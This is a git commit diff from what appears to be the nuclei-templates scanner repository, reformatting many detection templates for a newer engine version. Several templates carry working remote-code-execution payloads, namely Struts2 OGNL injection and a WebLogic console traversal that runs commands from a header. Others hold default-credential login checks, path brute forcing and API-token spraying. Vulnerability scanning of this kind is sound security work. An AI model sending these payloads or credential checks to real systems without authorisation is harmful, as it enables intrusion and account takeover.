Merge pull request #2844 from projectdiscovery/more-fixes

Changes to adopt v2.5.3 engine
patch-1
Sandeep Singh 2021-10-21 07:21:20 +05:30 committed by GitHub
commit a21cec6362
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
85 changed files with 129 additions and 79 deletions

View File

@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution # files is a list of files to ignore template execution
# unless asked for by the user. # unless asked for by the user.
files:
- "token-spray/"

View File

@ -11,25 +11,19 @@ info:
requests: requests:
- raw: - raw:
- | - |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
- | - |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
- | - |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Connection: close
Accept: */* Accept: */*
Accept-Language: en
payloads: payloads:
params: params:
@ -40,11 +34,12 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
condition: or
status: status:
- 200 - 200
- 400 - 400
condition: or
- type: regex - type: regex
part: body
regex: regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body

View File

@ -91,15 +91,16 @@ requests:
- webviewer - webviewer
- welcome - welcome
attack: sniper
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
condition: and
words: words:
- "environment variable" - "environment variable"
- "display library search paths" - "display library search paths"
condition: and

View File

@ -22,14 +22,16 @@ requests:
payloads: payloads:
ids: helpers/wordlists/numbers.txt ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50 threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "<title>Dashboard</title>" - "<title>Dashboard</title>"

View File

@ -28,8 +28,7 @@ requests:
- | - |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cmd: §exec§ cmd: {{exec}}
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
condition: or
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
- "\\[(font|extension|file)s\\]" - "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status - type: status
status: status:

View File

@ -31,11 +31,12 @@ requests:
command: command:
- "systeminfo" # Windows - "systeminfo" # Windows
- "lsb_release -a" # Linux - "lsb_release -a" # Linux
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: regex
condition: or
regex: regex:
- "OS Name:.*Microsoft Windows" - "OS Name:.*Microsoft Windows"
- "Distributor ID:" - "Distributor ID:"

View File

@ -22,6 +22,8 @@ requests:
path: path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -1,4 +1,5 @@
id: grafana-default-login id: grafana-default-login
info: info:
name: Grafana Default Login name: Grafana Default Login
author: pdteam author: pdteam
@ -26,7 +27,6 @@ requests:
username: username:
- admin - admin
- admin - admin
password: password:
- prom-operator - prom-operator
- admin - admin
@ -35,15 +35,13 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- grafana_session - "grafana_session" # Login cookie
part: header part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word - type: word
words:
- Logged in
part: body part: body
# Check for valid string on valid login. words:
- "Logged in" # Logged in keyword
- type: status - type: status
status: status:

View File

@ -20,15 +20,13 @@ requests:
username: username:
- admin - admin
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- '"redirect": "/htdocs/pages/main/main.lsp"' - '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""' - '"error": ""'
condition: and
- type: status - type: status
status: status:

View File

@ -18,22 +18,21 @@ requests:
payloads: payloads:
password: password:
- 12345 - "12345"
attack: sniper
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "session_id=" - "session_id="
- "resource" - "resource"
condition: and
- type: word - type: word
words:
- "Invalid Password"
part: body part: body
negative: true negative: true
words:
- "Invalid Password"
- type: status - type: status
status: status:

View File

@ -23,17 +23,17 @@ requests:
payloads: payloads:
path: helpers/wordlists/adminer-paths.txt path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50 threads: 50
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "- Adminer</title>" - "- Adminer</title>"
- "partial(verifyVersion, " - "partial(verifyVersion"
condition: and
- type: status - type: status
status: status:
- 200 - 200

View File

@ -14,12 +14,10 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Origin: {{BaseURL}} Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9 Accept-Language: en-US,en;q=0.9
Connection: close
payloads: payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50 threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true stop-at-first-match: true

View File

@ -1,4 +1,5 @@
id: prestashop-module-fuzz id: prestashop-module-fuzz
info: info:
name: Prestashop Modules Enumeration name: Prestashop Modules Enumeration
author: meme-lord author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads: payloads:
path: helpers/wordlists/prestashop-modules.txt path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
condition: and
words: words:
- "<module>" - "<module>"
- "<name>" - "<name>"
- "<displayName>" - "<displayName>"
- "<is_configurable>" - "<is_configurable>"
- "</module>" - "</module>"
condition: and
- type: status - type: status
status: status:

View File

@ -1,4 +1,5 @@
id: wordpress-plugins-detect id: wordpress-plugins-detect
info: info:
name: WordPress Plugins Detection name: WordPress Plugins Detection
author: 0xcrypto author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads: payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -1,4 +1,5 @@
id: wordpress-themes-detect id: wordpress-themes-detect
info: info:
name: WordPress Theme Detection name: WordPress Theme Detection
author: 0xcrypto author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads: payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status

View File

@ -14,6 +14,7 @@ requests:
Host: {{Hostname}} Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads: payloads:
path: path:
- / - /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/ - /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport - /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: dsl

View File

@ -1,15 +1,19 @@
## About ## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage ## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
# Run Nuclei specifying all the api templates:
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest ```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
``` ```
## Credits ## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,asana tags: token-spray,asana
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
@ -16,6 +17,6 @@ requests:
matchers: matchers:
- type: status - type: status
negative: true
status: status:
- 401 - 401
negative: true

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,bing,maps,bingmaps tags: token-spray,bing,maps,bingmaps
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,bitly tags: token-spray,bitly
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,buildkite tags: token-spray,buildkite
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,buttercms tags: token-spray,buttercms
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,calendly tags: token-spray,calendly
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,circle,circleci tags: token-spray,circle,circleci
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,deviantart tags: token-spray,deviantart
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,dropbox tags: token-spray,dropbox
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,github tags: token-spray,github
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,autocomplete tags: token-spray,google,autocomplete
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search tags: token-spray,google,search
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,directions tags: token-spray,google,directions
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,elevation tags: token-spray,google,elevation
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,find,text tags: token-spray,google,find,text
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,distance,matrix tags: token-spray,google,distance,matrix
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,geocode tags: token-spray,google,geocode
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,19 +6,21 @@ info:
severity: info severity: info
tags: token-spray,google,geolocation tags: token-spray,google,geolocation
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
negative: true
words: words:
- 'error' - 'error'
negative: true
- type: status - type: status
negative: true
status: status:
- 404 - 404
negative: true

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps,embed tags: token-spray,google,maps,embed
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps,embed tags: token-spray,google,maps,embed
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search,nearby tags: token-spray,google,search,nearby
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,roads tags: token-spray,google,roads
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,place,details tags: token-spray,google,place,details
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,places,photo tags: token-spray,google,places,photo
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,playable,locations tags: token-spray,google,playable,locations
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,route tags: token-spray,google,route
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,speed,limit tags: token-spray,google,speed,limit
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,maps tags: token-spray,google,maps
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,streetview tags: token-spray,google,streetview
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,timezone tags: token-spray,google,timezone
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -6,6 +6,7 @@ info:
severity: info severity: info
tags: token-spray,google,search,places,text tags: token-spray,google,search,places,text
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
@ -14,6 +15,6 @@ requests:
matchers: matchers:
- type: word - type: word
part: body part: body
negative: true
words: words:
- 'error_message' - 'error_message'
negative: true

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,heroku tags: token-spray,heroku
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:
@ -17,9 +18,9 @@ requests:
matchers: matchers:
- type: status - type: status
condition: or
status: status:
- 200 - 200
- 201 - 201
- 202 - 202
- 206 - 206
condition: or

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,hubspot tags: token-spray,hubspot
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,instagram,graph tags: token-spray,instagram,graph
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,ipstack tags: token-spray,ipstack
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,iterable tags: token-spray,iterable
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,jumpcloud tags: token-spray,jumpcloud
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,lokalise tags: token-spray,lokalise
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,loqate tags: token-spray,loqate
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mailchimp tags: token-spray,mailchimp
self-contained: true
network: network:
- inputs: - inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mailgun tags: token-spray,mailgun
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,mapbox tags: token-spray,mapbox
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,newrelic,nerdgraph tags: token-spray,newrelic,nerdgraph
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,node,npm,package,manager tags: token-spray,node,npm,package,manager
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,weather,openweather tags: token-spray,weather,openweather
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pagerduty tags: token-spray,pagerduty
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pendo tags: token-spray,pendo
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,pivotaltracker tags: token-spray,pivotaltracker
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,postmark tags: token-spray,postmark
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,sendgrid tags: token-spray,sendgrid
self-contained: true
network: network:
- inputs: - inputs:
- data: "ehlo\r\n" - data: "ehlo\r\n"

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,slack tags: token-spray,slack
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,sonarcloud tags: token-spray,sonarcloud
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,spotify tags: token-spray,spotify
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,square tags: token-spray,square
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,stripe tags: token-spray,stripe
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,tinypng tags: token-spray,tinypng
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,travis tags: token-spray,travis
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,twitter tags: token-spray,twitter
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,visualstudio,microsoft tags: token-spray,visualstudio,microsoft
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,wakatime tags: token-spray,wakatime
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:

View File

@ -7,6 +7,7 @@ info:
severity: info severity: info
tags: token-spray,weglot tags: token-spray,weglot
self-contained: true
requests: requests:
- method: POST - method: POST
path: path:

View File

@ -7,17 +7,19 @@ info:
severity: info severity: info
tags: token-spray,youtube tags: token-spray,youtube
self-contained: true
requests: requests:
- method: GET - method: GET
path: path:
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
matchers-condition: or
matchers-condition: or
matchers: matchers:
